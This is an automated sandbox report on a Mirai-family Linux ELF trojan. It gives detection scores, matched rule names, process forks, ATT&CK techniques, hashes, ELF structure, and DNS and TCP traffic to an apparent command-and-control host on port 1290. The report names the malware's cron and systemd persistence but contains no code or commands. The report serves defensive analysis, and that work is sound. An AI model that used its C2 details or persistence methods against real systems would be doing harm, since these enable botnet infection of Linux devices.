Linux
Analysis Report
i686.elf
Overview
General Information
Detection
Score: | 72 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1558940 |
Start date and time: | 2024-11-20 00:56:13 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 41s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | i686.elf |
Detection: | MAL |
Classification: | mal72.troj.linELF@0/4@31/0 |
- Excluded domains from analysis (whitelisted): 14.2.168.192.in-addr.arpa
Command: | /tmp/i686.elf |
PID: | 5495 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | we kinda rocking ngl |
Standard Error: |
- system is lnxubuntu20
- i686.elf New Fork (PID: 5496, Parent: 5495)
- i686.elf New Fork (PID: 5497, Parent: 5496)
- i686.elf New Fork (PID: 5500, Parent: 5496)
- i686.elf New Fork (PID: 5501, Parent: 5496)
- i686.elf New Fork (PID: 5502, Parent: 5496)
- sh New Fork (PID: 5503, Parent: 5502)
- sh New Fork (PID: 5505, Parent: 5503)
- sh New Fork (PID: 5506, Parent: 5503)
- sh New Fork (PID: 5507, Parent: 5503)
- sh New Fork (PID: 5508, Parent: 5503)
- sh New Fork (PID: 5511, Parent: 5503)
- sh New Fork (PID: 5504, Parent: 5502)
- i686.elf New Fork (PID: 5512, Parent: 5496)
- sh New Fork (PID: 5513, Parent: 5512)
- systemd New Fork (PID: 5516, Parent: 5515)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Linux_Trojan_Mirai_268aac0b | unknown | unknown |
| |
Linux_Trojan_Mirai_0cb1699c | unknown | unknown |
| |
Linux_Trojan_Mirai_3a85a418 | unknown | unknown |
| |
Linux_Trojan_Mirai_2e3f67a9 | unknown | unknown |
| |
Linux_Trojan_Mirai_88de437f | unknown | unknown |
| |
Click to see the 1 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
Linux_Trojan_Mirai_268aac0b | unknown | unknown |
| |
Linux_Trojan_Mirai_0cb1699c | unknown | unknown |
| |
Linux_Trojan_Mirai_3a85a418 | unknown | unknown |
| |
Linux_Trojan_Mirai_2e3f67a9 | unknown | unknown |
| |
Linux_Trojan_Mirai_88de437f | unknown | unknown |
| |
Click to see the 7 entries |
Click to jump to signature section
AV Detection |
---|
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | String: | ||
Source: | String: | ||
Source: | String: | ||
Source: | String: | ||
Source: | String: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | Reads hosts file: | Jump to behavior |
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: |
System Summary |
---|
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | String containing 'busybox' found: | ||
Source: | String containing 'busybox' found: |
Source: | .symtab present: |
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: | ||
Source: | Matched rule: |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior |
Source: | File written: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | Directory: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior | ||
Source: | Shell command executed: | Jump to behavior |
Source: | Chmod executable: | Jump to behavior | ||
Source: | Chmod executable: | Jump to behavior |
Source: | Systemctl executable: | Jump to behavior |
Source: | Queries kernel information via 'uname': | Jump to behavior |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 2 Scripting | Valid Accounts | 1 Scheduled Task/Job | 1 Unix Shell Configuration Modification | 1 Unix Shell Configuration Modification | 1 File and Directory Permissions Modification | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Systemd Service | 1 Systemd Service | 1 Hidden Files and Directories | LSASS Memory | 1 File and Directory Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | 1 Scheduled Task/Job | 1 Scheduled Task/Job | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | 2 Scripting | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction |
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
32% | ReversingLabs | Linux.Backdoor.Mirai | ||
100% | Joe Sandbox ML |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
host.zopz-api.com | 172.111.38.48 | true | false | unknown | |
daisy.ubuntu.com | unknown | unknown | false | high | |
motd.ubuntu.com | unknown | unknown | false | high |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | high | |||
false | high |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.125.190.26 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false | |
172.111.38.48 | host.zopz-api.com | Reserved | 54540 | INCERO-HVVCUS | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
185.125.190.26 | Get hash | malicious | Gafgyt, Mirai, Okiru | Browse | ||
Get hash | malicious | Gafgyt, Mirai, Okiru | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
INCERO-HVVCUS | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | SystemBC | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Quasar | Browse |
| ||
Get hash | malicious | Quasar | Browse |
| ||
CANONICAL-ASGB | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Gafgyt, Okiru | Browse |
|
Process: | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
File Type: | |
Category: | dropped |
Size (bytes): | 76 |
Entropy (8bit): | 3.7627880354948586 |
Encrypted: | false |
SSDEEP: | 3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb |
MD5: | D86A1F5765F37989EB0EC3837AD13ECC |
SHA1: | D749672A734D9DEAFD61DCA501C6929EC431B83E |
SHA-256: | 85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45 |
SHA-512: | 338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /tmp/i686.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 178 |
Entropy (8bit): | 4.358630015292201 |
Encrypted: | false |
SSDEEP: | 3:C7exTAXWTHYMOduLWiHSH7zFUbKEVQRFQ4AXWTHYMOduLWiHc:yeGsHPirvFNBjwsHPiL |
MD5: | C3685F292213652676F734AB36C060EE |
SHA1: | 1D05F7F6302EC60E7990DE4BBE9180C149EFC731 |
SHA-256: | D070C429D850B4BAAED03330B6F96C7473ED86D0D33A2FACCD11FB3325767C4C |
SHA-512: | 7AC7D9594C8A4F0160FF9AAE92F7A1EFDFDB933EE3006DCCAC910C79F6FC529AF07B8DF9DAD16E8C21EC3DEF5C5AB9168E4994AE87EDE23E7D4A20F2E7178295 |
Malicious: | true |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /tmp/i686.elf |
File Type: | |
Category: | dropped |
Size (bytes): | 356 |
Entropy (8bit): | 4.9110117370593995 |
Encrypted: | false |
SSDEEP: | 6:z872KstRZAMg8uko4dj2+feGsHPirvFNBjwsHPiFLnLQmWA4Rv:zE2ltRZAXsQ+GGmPirvFNBjwmPipLHW7 |
MD5: | F03C70CD4C61A1852F9E19B8FB0D639C |
SHA1: | A6C078FFFFDF05C4C47B273B24E6B3FF4EF7E008 |
SHA-256: | AE50A3052A395987A2779DEB9253D4AA8638F2F8B1CDA7DF9039388F21BE7A90 |
SHA-512: | 6277FBBFFCDD72FC3712721525538AC07FC46D290EBB02BE34CEF52B3E62BFA8A66F4E834D364D220108C815192E391AD986F05662FCBFAE674417507F4BCC20 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 235 |
Entropy (8bit): | 5.104158129595515 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQLvamuZHGMQ5UYLtCFt3HY8jsHB:8QjHig8mmqeHLUHY8mB |
MD5: | D44BADE6FD643ECE44BA05AA097B89D6 |
SHA1: | A431A237D6C77798FE8E433FA691E6B4DFAE5020 |
SHA-256: | 34DF6E7AD21D72F9F78A822D3A8F1AC2027A873CFEE6B94588FE246EA0C5E6CD |
SHA-512: | 8C6940C8EC55B4D7E9B2A5C3FAD2D26D712EE8D712DF00D18E674FCB3B819B599BF1101D36A66FEFAB98E9C88B4F8C7FDC1267E92306980A12859E00D217C5E1 |
Malicious: | true |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 6.402441515864084 |
TrID: |
|
File name: | i686.elf |
File size: | 70'372 bytes |
MD5: | ec6e587f931b314683abe573d5d9bc2a |
SHA1: | dd2a580e000eb5662b4fb4df5918e9779673bb90 |
SHA256: | e1b71400f50e1e8a099dc9311c317c57e42e2310d1e0002353d115c736b2b0a7 |
SHA512: | 7136f3df2e70715ce57929d48ca1a96454855bf775d47073e2dc920a1a88807415306549d5aeb3278bd1e54f9c6ac47f0a25dae51c919733c8b638ee40b7335e |
SSDEEP: | 1536:zt+6I5jIykn/IUG+BHOQUhjNjDnc4SOs9WLCm0gSDzutUI:8BIykgUG+NOnnfzDt+m0gSPm3 |
TLSH: | B463F781BA07CAF6D41754B041E7BA3F8E31FD2A0872869DEF25FEA5CB235C16215358 |
File Content Preview: | .ELF....................h...4...........4. ...(.....................D...D................................i..........Q.td............................U..S.......w....h........[]...$.............U......=.....t..1....$......$.......u........t...$@~........... |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 3 |
Section Header Offset: | 69812 |
Section Header Size: | 40 |
Number of Section Headers: | 14 |
Header String Table Index: | 13 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x8048094 | 0x94 | 0x1c | 0x0 | 0x6 | AX | 0 | 0 | 1 |
.text | PROGBITS | 0x80480b0 | 0xb0 | 0xe401 | 0x0 | 0x6 | AX | 0 | 0 | 16 |
.fini | PROGBITS | 0x80564b1 | 0xe4b1 | 0x17 | 0x0 | 0x6 | AX | 0 | 0 | 1 |
.rodata | PROGBITS | 0x80564e0 | 0xe4e0 | 0x195f | 0x0 | 0x2 | A | 0 | 0 | 32 |
.eh_frame | PROGBITS | 0x8057e40 | 0xfe40 | 0x4 | 0x0 | 0x2 | A | 0 | 0 | 4 |
.ctors | PROGBITS | 0x8058000 | 0x10000 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.dtors | PROGBITS | 0x8058008 | 0x10008 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.jcr | PROGBITS | 0x8058010 | 0x10010 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.got.plt | PROGBITS | 0x8058014 | 0x10014 | 0xc | 0x4 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x8058020 | 0x10020 | 0x2a0 | 0x0 | 0x3 | WA | 0 | 0 | 32 |
.bss | NOBITS | 0x80582c0 | 0x102c0 | 0x6700 | 0x0 | 0x3 | WA | 0 | 0 | 32 |
.comment | PROGBITS | 0x0 | 0x102c0 | 0xd92 | 0x0 | 0x0 | 0 | 0 | 1 | |
.shstrtab | STRTAB | 0x0 | 0x11052 | 0x5f | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x8048000 | 0x8048000 | 0xfe44 | 0xfe44 | 6.4186 | 0x5 | R E | 0x1000 | .init .text .fini .rodata .eh_frame | |
LOAD | 0x10000 | 0x8058000 | 0x8058000 | 0x2c0 | 0x69c0 | 3.8209 | 0x6 | RW | 0x1000 | .ctors .dtors .jcr .got.plt .data .bss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x6 | RW | 0x4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 00:57:04.101002932 CET | 45150 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:57:08.196857929 CET | 45150 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:57:14.596705914 CET | 46540 | 443 | 192.168.2.14 | 185.125.190.26 |
Nov 20, 2024 00:57:16.578207016 CET | 45154 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:57:17.604470968 CET | 45154 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:57:19.620385885 CET | 45154 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:57:23.812220097 CET | 45154 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:57:42.577183962 CET | 45156 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:57:43.587552071 CET | 45156 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:57:44.547434092 CET | 46540 | 443 | 192.168.2.14 | 185.125.190.26 |
Nov 20, 2024 00:57:45.603368998 CET | 45156 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:57:49.667227983 CET | 45156 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:57:58.076742887 CET | 45158 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:57:59.106848001 CET | 45158 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:58:01.122777939 CET | 45158 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:58:05.282610893 CET | 45158 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:58:13.576059103 CET | 45160 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:58:14.594258070 CET | 45160 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:58:16.610263109 CET | 45160 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:58:20.642137051 CET | 45160 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:59:00.015141010 CET | 40012 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 00:59:00.020584106 CET | 1290 | 40012 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 00:59:00.020982027 CET | 40012 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 00:59:00.021038055 CET | 40012 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 00:59:00.026232958 CET | 1290 | 40012 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 00:59:00.489540100 CET | 1290 | 40012 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 00:59:00.490072966 CET | 40012 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 00:59:05.490263939 CET | 1290 | 40012 | 172.111.38.48 | 192.168.2.14 |
Nov 20, 2024 00:59:05.490422010 CET | 40012 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 00:59:05.490614891 CET | 40012 | 1290 | 192.168.2.14 | 172.111.38.48 |
Nov 20, 2024 00:59:05.496099949 CET | 1290 | 40012 | 172.111.38.48 | 192.168.2.14 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Nov 20, 2024 00:57:09.942131996 CET | 60217 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:11.328425884 CET | 32881 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:14.656331062 CET | 55527 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:14.656399012 CET | 56134 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:14.944710970 CET | 51756 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:19.660548925 CET | 56134 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:19.948400021 CET | 59412 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:24.828072071 CET | 56134 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:24.952258110 CET | 40610 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:26.827796936 CET | 37340 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:57:29.956013918 CET | 45867 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:30.077620029 CET | 56134 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:32.077528000 CET | 37340 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:57:35.327419996 CET | 56134 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:37.327415943 CET | 37340 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:57:40.577192068 CET | 56134 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:45.827086926 CET | 56134 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:52.826755047 CET | 57820 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:54.960350990 CET | 58471 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:57:59.965372086 CET | 43046 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:58:04.970401049 CET | 35830 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:58:08.326240063 CET | 38894 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:58:09.975533009 CET | 50156 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:58:14.980410099 CET | 53170 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:58:23.825552940 CET | 50014 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:58:29.075628042 CET | 51591 | 53 | 192.168.2.14 | 8.8.8.8 |
Nov 20, 2024 00:58:39.982966900 CET | 59123 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:58:44.988172054 CET | 53102 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:58:49.992943048 CET | 48917 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:58:54.997931004 CET | 39984 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:59:00.000642061 CET | 59126 | 53 | 192.168.2.14 | 1.1.1.1 |
Nov 20, 2024 00:59:00.014889002 CET | 53 | 59126 | 1.1.1.1 | 192.168.2.14 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Nov 20, 2024 00:57:09.942131996 CET | 192.168.2.14 | 1.1.1.1 | 0xc6b3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:11.328425884 CET | 192.168.2.14 | 1.1.1.1 | 0xb9ec | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:14.656331062 CET | 192.168.2.14 | 1.1.1.1 | 0x2348 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:14.656399012 CET | 192.168.2.14 | 1.1.1.1 | 0xb86a | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:14.944710970 CET | 192.168.2.14 | 1.1.1.1 | 0xc6b3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:19.660548925 CET | 192.168.2.14 | 1.1.1.1 | 0xb86a | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:19.948400021 CET | 192.168.2.14 | 1.1.1.1 | 0xc6b3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:24.828072071 CET | 192.168.2.14 | 1.1.1.1 | 0xb86a | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:24.952258110 CET | 192.168.2.14 | 1.1.1.1 | 0xc6b3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:26.827796936 CET | 192.168.2.14 | 8.8.8.8 | 0xb9ec | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:29.956013918 CET | 192.168.2.14 | 1.1.1.1 | 0xc6b3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:30.077620029 CET | 192.168.2.14 | 1.1.1.1 | 0xb86a | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:32.077528000 CET | 192.168.2.14 | 8.8.8.8 | 0xb9ec | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:35.327419996 CET | 192.168.2.14 | 1.1.1.1 | 0xb86a | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:37.327415943 CET | 192.168.2.14 | 8.8.8.8 | 0xb9ec | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:40.577192068 CET | 192.168.2.14 | 1.1.1.1 | 0xb86a | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:45.827086926 CET | 192.168.2.14 | 1.1.1.1 | 0xb86a | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:52.826755047 CET | 192.168.2.14 | 1.1.1.1 | 0xb9ec | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:57:54.960350990 CET | 192.168.2.14 | 1.1.1.1 | 0x93c3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:57:59.965372086 CET | 192.168.2.14 | 1.1.1.1 | 0x93c3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:04.970401049 CET | 192.168.2.14 | 1.1.1.1 | 0x93c3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:08.326240063 CET | 192.168.2.14 | 1.1.1.1 | 0xb9ec | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:58:09.975533009 CET | 192.168.2.14 | 1.1.1.1 | 0x93c3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:14.980410099 CET | 192.168.2.14 | 1.1.1.1 | 0x93c3 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:23.825552940 CET | 192.168.2.14 | 1.1.1.1 | 0xb9ec | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:58:29.075628042 CET | 192.168.2.14 | 8.8.8.8 | 0xb9ec | Standard query (0) | 28 | IN (0x0001) | false | |
Nov 20, 2024 00:58:39.982966900 CET | 192.168.2.14 | 1.1.1.1 | 0x9c3e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:44.988172054 CET | 192.168.2.14 | 1.1.1.1 | 0x9c3e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:49.992943048 CET | 192.168.2.14 | 1.1.1.1 | 0x9c3e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:58:54.997931004 CET | 192.168.2.14 | 1.1.1.1 | 0x9c3e | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Nov 20, 2024 00:59:00.000642061 CET | 192.168.2.14 | 1.1.1.1 | 0x9c3e | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Nov 20, 2024 00:59:00.014889002 CET | 1.1.1.1 | 192.168.2.14 | 0x9c3e | No error (0) | 172.111.38.48 | A (IP address) | IN (0x0001) | false |
System Behavior
Start time (UTC): | 23:57:05 |
Start date (UTC): | 19/11/2024 |
Path: | /tmp/i686.elf |
Arguments: | /tmp/i686.elf |
File size: | 70372 bytes |
MD5 hash: | ec6e587f931b314683abe573d5d9bc2a |
